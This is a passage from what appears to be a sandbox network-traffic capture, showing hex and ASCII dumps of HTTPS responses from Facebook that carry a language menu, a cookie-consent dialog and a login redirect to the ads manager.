                                                                                                                                  Data Ascii: _markup_3310c079_0_3_JC","__markup_3310c079_0_4_eX","__markup_3310c079_0_5_y\/","__markup_3310c079_0_6_PK","__markup_3310c079_0_7_fA","__markup_3310c079_0_8_Hj","__markup_3310c079_0_9_im","__markup_3310c079_0_a_tF","__markup_3310c079_0_b_xt","__markup_331
                                                                                                                                  2022-10-17 20:07:09 UTC400INData Raw: 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 33 5f 4a 43 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 4b 0d 0a
                                                                                                                                  Data Ascii: p":{"__m":"__markup_3310c079_0_3_JC"},"label":"English (UK
                                                                                                                                  2022-10-17 20:07:09 UTC400INData Raw: 36 36 37 63 0d 0a 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 65 6e 5f 55 53 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 74 72 75 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 65 58 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 53 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65
                                                                                                                                  Data Ascii: 667c)","title":"","className":"headerItem"},{"class":"headerItem","value":"en_US","selected":true,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_4_eX"},"label":"English (US)","title":"","className":"headerItem"},{"class":"heade
                                                                                                                                  2022-10-17 20:07:09 UTC402INData Raw: 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 78 74 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 4e 6f 72 73 6b 20 28 62 6f 6b 6d 5c 75 30 30 65 35 6c 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 70 6c 5f 50 4c 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f
                                                                                                                                  Data Ascii: ectableItem"},"markup":{"__m":"__markup_3310c079_0_b_xt"},"label":"Norsk (bokm\u00e5l)","title":"","className":"headerItem"},{"class":"headerItem","value":"pl_PL","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_c_
                                                                                                                                  2022-10-17 20:07:09 UTC403INData Raw: 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 74 72 5f 54 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6a 5f 55 43 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 54 5c 75 30 30 66 63 72 6b 5c 75 30 30 65 37 65 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 63 73 5f 43 5a 22 2c 22 73 65 6c 65 63 74 65 64 22
                                                                                                                                  Data Ascii: rItem"},{"class":"headerItem","value":"tr_TR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_j_UC"},"label":"T\u00fcrk\u00e7e","title":"","className":"headerItem"},{"class":"headerItem","value":"cs_CZ","selected"
                                                                                                                                  2022-10-17 20:07:09 UTC405INData Raw: 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 74 68 5f 54 48 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 71 5f 53 51 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 65 32 30 5c 75 30 65 33 32 5c 75 30 65 32 39 5c 75 30 65 33 32 5c 75 30 65 34 34 5c 75 30 65 31 37 5c 75 30 65 32 32 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22
                                                                                                                                  Data Ascii: Name":"headerItem"},{"class":"headerItem","value":"th_TH","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_q_SQ"},"label":"\u0e20\u0e32\u0e29\u0e32\u0e44\u0e17\u0e22","title":"","className":"headerItem"},{"class":"
                                                                                                                                  2022-10-17 20:07:09 UTC406INData Raw: 6e 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 4c 61 79 65 72 52 65 6d 6f 76 65 4f 6e 48 69 64 65 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 61 61 22 2c 22 48 54 4d 4c 22 5d 2c 5b 7b 22 77 69 64 74 68 22 3a 36 38 30 2c 22 61 75 74 6f 68 69 64 65 22 3a 6e 75 6c 6c 2c 22 74 69 74 6c 65 49 44 22 3a 6e 75 6c 6c 2c 22 72 65 64 69 72 65 63 74 55 52 49 22 3a 6e 75 6c 6c 2c 22 66 69 78 65 64 54 6f 70 50 6f 73 69 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 69 67 6e 6f 72 65 46 69 78 65 64 54 6f 70 49 6e 53 68 6f 72 74 56 69 65 77 70 6f 72 74 22 3a 66 61 6c 73 65 2c 22 6c 61 62 65 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 62 65 6c 6c 65 64 42 79 22 3a 22 6d 61 6e 61 67 65 5f 63 6f 6f 6b 69 65 73 5f 74 69 74 6c 65 22 2c 22 68 65 69 67 68 74 22 3a 35 31 38
                                                                                                                                  Data Ascii: nTransition","LayerRemoveOnHide","__markup_9f5fac15_0_0_aa","HTML"],[{"width":680,"autohide":null,"titleID":null,"redirectURI":null,"fixedTopPosition":null,"ignoreFixedTopInShortViewport":false,"label":null,"labelledBy":"manage_cookies_title","height":518
                                                                                                                                  2022-10-17 20:07:09 UTC407INData Raw: 33 43 61 20 72 6f 6c 65 3d 5c 22 62 75 74 74 6f 6e 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 35 70 69 20 5f 32 61 67 66 20 5f 34 6f 5f 34 20 5f 39 6f 2d 65 20 5f 70 20 5f 34 6a 79 33 20 5f 35 31 37 68 20 5f 35 31 73 79 5c 22 20 68 72 65 66 3d 5c 22 23 5c 22 20 73 74 79 6c 65 3d 5c 22 6d 61 78 2d 77 69 64 74 68 3a 32 30 30 70 78 3b 5c 22 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 5c 22 74 72 75 65 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 5c 22 66 61 6c 73 65 5c 22 20 72 65 6c 3d 5c 22 74 6f 67 67 6c 65 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 38 5f 74 36 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 2d 78 65 20 5f 33 2d 38 5f 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20
                                                                                                                                  Data Ascii: 3Ca role=\"button\" class=\"_42ft _4jy0 _55pi _2agf _4o_4 _9o-e _p _4jy3 _517h _51sy\" href=\"#\" style=\"max-width:200px;\" aria-haspopup=\"true\" aria-expanded=\"false\" rel=\"toggle\" id=\"u_0_8_t6\">\u003Cspan class=\"_-xe _3-8_\">\u003Ci class=\"img
                                                                                                                                  2022-10-17 20:07:09 UTC409INData Raw: 69 63 65 73 20 66 6f 72 20 79 6f 75 2c 20 77 65 20 75 73 65 20 74 6f 6f 6c 73 20 66 72 6f 6d 20 6f 74 68 65 72 20 63 6f 6d 70 61 6e 69 65 73 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73 65 20 63 6f 6f 6b 69 65 73 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 33 5c 22 3e 59 6f 75 20 63 61 6e 20 61 6c 6c 6f 77 20 74 68 65 20 75 73 65 20 6f 66 20 61 6c 6c 20 63 6f 6f 6b 69 65 73 2c 20 6a 75 73 74 20 65 73 73 65 6e 74 69 61 6c 20 63 6f 6f 6b 69 65 73 20 6f 72 20 79 6f 75 20 63 61 6e 20 63 68 6f 6f 73 65 20 6d 6f 72 65 20 6f 70 74 69 6f 6e 73 20 62 65 6c 6f 77 2e 20 59 6f 75 20 63 61 6e 20 6c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74
                                                                                                                                  Data Ascii: ices for you, we use tools from other companies on Facebook. These companies also use cookies.\u003C\/div>\u003Cdiv class=\"_9xo3\">You can allow the use of all cookies, just essential cookies or you can choose more options below. You can learn more about
                                                                                                                                  2022-10-17 20:07:09 UTC410INData Raw: 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6c 5c 22 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 67 20 5f 39 76 37 76 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 51 76 36 44 33 48 54 65 5a 55 59 20 73 78 5f 33 61 36 38 31 38 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64
                                                                                                                                  Data Ascii: \"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">More information\u003C\/div>\u003C\/span>\u003Cspan class=\"_9ngg _9v7v\">\u003Ci class=\"img sp_Qv6D3HTeZUY sx_3a6818\">\u003C\/i>\u003C\/span>\u003C\/d
                                                                                                                                  2022-10-17 20:07:09 UTC412INData Raw: 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 61 5f 56 70 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6c 5c 22 3e 43 6f 6e 74 72 6f 6c 73 20 69 6e 20 79 6f 75 72 20 46 61 63 65 62 6f 6f 6b 20 61 63 63 6f 75 6e 74 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e
                                                                                                                                  Data Ascii: iv>\u003Cdiv>\u003Cdiv class=\"_9vtg\" id=\"u_0_a_Vp\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">Controls in your Facebook account\u003C\/div>\u003C\/span
                                                                                                                                  2022-10-17 20:07:09 UTC413INData Raw: 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 75 73 65 20 79 6f 75 72 20 61 64 20 70 72 65 66 65 72 65 6e 63 65 73 20 74 6f 20 6c 65 61 72 6e 20 77 68 79 20 79 6f 75 26 23 30 33 39 3b 72 65 20 73 65 65 69 6e 67 20 61 20 70 61 72 74 69 63 75 6c 61 72 20 61 64 20 61 6e 64 20 63 6f 6e 74 72 6f 6c 20 68 6f 77 20 77 65 20 75 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 68 61 74 20 77 65 20 63 6f 6c 6c 65 63 74 20 74 6f 20 73 68 6f 77 20 79 6f 75 20 61 64 73 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 4f 66 66 2d 46 61 63 65 62 6f 6f 6b 20 61 63 74 69 76 69 74 79 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f
                                                                                                                                  Data Ascii: \u003Cp class=\"_9o-m\">You can use your ad preferences to learn why you&#039;re seeing a particular ad and control how we use information that we collect to show you ads.\u003C\/p>\u003Cp class=\"_9si-\">Off-Facebook activity\u003C\/p>\u003Cp class=\"_9o
                                                                                                                                  2022-10-17 20:07:09 UTC415INData Raw: 20 74 68 72 6f 75 67 68 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 6f 70 74 6f 75 74 2e 61 62 6f 75 74 61 64 73 2e 69 6e 66 6f 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 32 2d 6e 53 58 58 51 43 76 65 51 6b 78 42 76 47 68 61 67 41 51 74 62 7a 57 35 42 58 66 6d 50 74 4b 56 37 33 72 46 75 57 78 78 6b 6d 37 65 32 51 55 31 47 45 5f 33 76 77 65 4c 38 6e 53 79 6e 57 2d 4c 4f 5f 56 6d 30 48 63 57 4b 35 41 6e 64 74 66 77 71 41 70 45 31 70 47 6f 54 32 4a 68 52 56 37 4c 73 32 64 59 54 6a 59 5f 37 6b 6d 5f 71 59 76 47 76 71 73 6e 65 45 53 30 56 68 41 52 57
                                                                                                                                  Data Ascii: through the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Foptout.aboutads.info\u00252F&amp;h=AT2-nSXXQCveQkxBvGhagAQtbzW5BXfmPtKV73rFuWxxkm7e2QU1GE_3vweL8nSynW-LO_Vm0HcWK5AndtfwqApE1pGoT2JhRV7Ls2dYTjY_7km_qYvGvqsneES0VhARW
                                                                                                                                  2022-10-17 20:07:09 UTC416INData Raw: 67 65 6e 65 72 61 6c 6c 79 20 75 73 65 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 73 69 6d 69 6c 61 72 20 74 65 63 68 6e 6f 6c 6f 67 69 65 73 20 61 73 20 70 61 72 74 20 6f 66 20 74 68 65 69 72 20 73 65 72 76 69 63 65 73 2e 20 54 6f 20 6c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 68 6f 77 20 61 64 76 65 72 74 69 73 65 72 73 20 67 65 6e 65 72 61 6c 6c 79 20 75 73 65 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 74 68 65 20 63 68 6f 69 63 65 73 20 74 68 65 79 20 6f 66 66 65 72 2c 20 79 6f 75 20 63 61 6e 20 72 65 76 69 65 77 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 72 65 73 6f 75 72 63 65 73 3a 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 75 6c 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 71 5c 22 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66
                                                                                                                                  Data Ascii: generally use cookies and similar technologies as part of their services. To learn more about how advertisers generally use cookies and the choices they offer, you can review the following resources:\u003C\/p>\u003Cul class=\"_9o-q\">\u003Cli>\u003Ca href
                                                                                                                                  2022-10-17 20:07:09 UTC418INData Raw: 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 63 5f 45 58 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6c 5c 22 3e 43 6f 6e 74 72 6f 6c 6c 69 6e 67 20 63 6f 6f 6b 69 65 73 20 77 69 74 68 20 62 72 6f 77 73 65 72 20 73 65 74 74 69 6e 67 73 5c 75 30
                                                                                                                                  Data Ascii: div>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_9vtg\" id=\"u_0_c_EX\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">Controlling cookies with browser settings\u0
                                                                                                                                  2022-10-17 20:07:09 UTC419INData Raw: 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 5c 75 30 30 32 35 32 46 65 6e 2d 69 65 5c 75 30 30 32 35 32 46 68 65 6c 70 5c 75 30 30 32 35 32 46 31 37 34 34 32 5c 75 30 30 32 35 32 46 77 69 6e 64 6f 77 73 2d 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2d 64 65 6c 65 74 65 2d 6d 61 6e 61 67 65 2d 63 6f 6f 6b 69 65 73 26 61 6d 70 3b 68 3d 41 54 32 6e 31 78 51 79 48 55 35 43 52 49 35 45 66 33 79 6e 4b 35 53 68 38 46 39 54 6d 46 51 48 62 34 74 30 56 2d 76 6c 56 61 4a 6d 61 45 51 55 58 69 41 51 78 56 4e 57 32 7a 35 79 42 6d 2d 6a 54 4a 6c 69 5a
                                                                                                                                  Data Ascii: \"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.microsoft.com\u00252Fen-ie\u00252Fhelp\u00252F17442\u00252Fwindows-internet-explorer-delete-manage-cookies&amp;h=AT2n1xQyHU5CRI5Ef3ynK5Sh8F9TmFQHb4t0V-vlVaJmaEQUXiAQxVNW2z5yBm-jTJliZ
                                                                                                                                  2022-10-17 20:07:09 UTC421INData Raw: 6a 54 4a 67 4b 35 30 52 32 30 6a 30 31 62 4c 4e 33 53 73 6b 34 33 52 72 5a 57 51 72 64 6d 41 4c 53 67 75 4e 70 67 65 79 65 51 35 47 53 61 2d 67 5a 77 6f 52 4c 77 53 53 62 4a 79 39 78 78 65 72 7a 6e 49 61 39 59 72 55 4a 4f 58 34 35 62 38 7a 44 56 51 46 4a 37 44 4e 65 68 7a 4e 45 57 4a 36 63 70 67 48 56 42 79 78 52 55 6b 4a 59 73 62 35 51 48 57 51 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 53 61 66 61 72 69 20 4d 6f 62 69 6c 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73
                                                                                                                                  Data Ascii: jTJgK50R20j01bLN3Ssk43RrZWQrdmALSguNpgeyeQ5GSa-gZwoRLwSSbJy9xxerznIa9YrUJOX45b8zDVQFJ7DNehzNEWJ6cpgHVByxRUkJYsb5QHWQ\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Safari Mobile\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https
                                                                                                                                  2022-10-17 20:07:09 UTC422INData Raw: 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 31 5f 77 57 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 44 61 6e 73 6b 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 32 5f 73 65 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 44 65 75 74 73 63 68 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 33 5f 4a 43 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 4b 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 65 58 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 53 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 79 5c 2f 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45
                                                                                                                                  Data Ascii: __markup_3310c079_0_1_wW",{"__html":"Dansk"},1],["__markup_3310c079_0_2_se",{"__html":"Deutsch"},1],["__markup_3310c079_0_3_JC",{"__html":"English (UK)"},1],["__markup_3310c079_0_4_eX",{"__html":"English (US)"},1],["__markup_3310c079_0_5_y\/",{"__html":"E
                                                                                                                                  2022-10-17 20:07:09 UTC424INData Raw: 36 34 61 5c 75 30 36 32 39 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 70 5f 79 57 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 39 33 39 5c 75 30 39 33 66 5c 75 30 39 32 38 5c 75 30 39 34 64 5c 75 30 39 32 36 5c 75 30 39 34 30 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 71 5f 53 51 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 65 32 30 5c 75 30 65 33 32 5c 75 30 65 32 39 5c 75 30 65 33 32 5c 75 30 65 34 34 5c 75 30 65 31 37 5c 75 30 65 32 32 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 72 5f 77 61 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 35 33 66 30 5c 75 37 30 36 33 29 22 7d 2c 31 5d 2c 5b
                                                                                                                                  Data Ascii: 64a\u0629"},1],["__markup_3310c079_0_p_yW",{"__html":"\u0939\u093f\u0928\u094d\u0926\u0940"},1],["__markup_3310c079_0_q_SQ",{"__html":"\u0e20\u0e32\u0e29\u0e32\u0e44\u0e17\u0e22"},1],["__markup_3310c079_0_r_wa",{"__html":"\u4e2d\u6587(\u53f0\u7063)"},1],[
                                                                                                                                  2022-10-17 20:07:09 UTC425INData Raw: 6f 72 6b 65 72 4c 6f 67 69 6e 41 6e 64 4c 6f 67 6f 75 74 22 2c 22 6c 6f 67 69 6e 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 53 63 72 69 70 74 50 61 74 68 22 2c 22 73 65 74 22 2c 5b 5d 2c 5b 22 58 57 65 62 4c 6f 67 69 6e 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 22 39 36 65 38 38 61 66 33 22 2c 7b 22 69 6d 70 5f 69 64 22 3a 22 31 77 33 43 66 42 6f 75 6b 70 6b 76 76 6f 75 77 77 22 2c 22 65 66 5f 70 61 67 65 22 3a 6e 75 6c 6c 2c 22 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e
                                                                                                                                  Data Ascii: orkerLoginAndLogout","login",[],[]],["ScriptPath","set",[],["XWebLoginController","96e88af3",{"imp_id":"1w3CfBoukpkvvouww","ef_page":null,"uri":"https:\/\/www.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fman
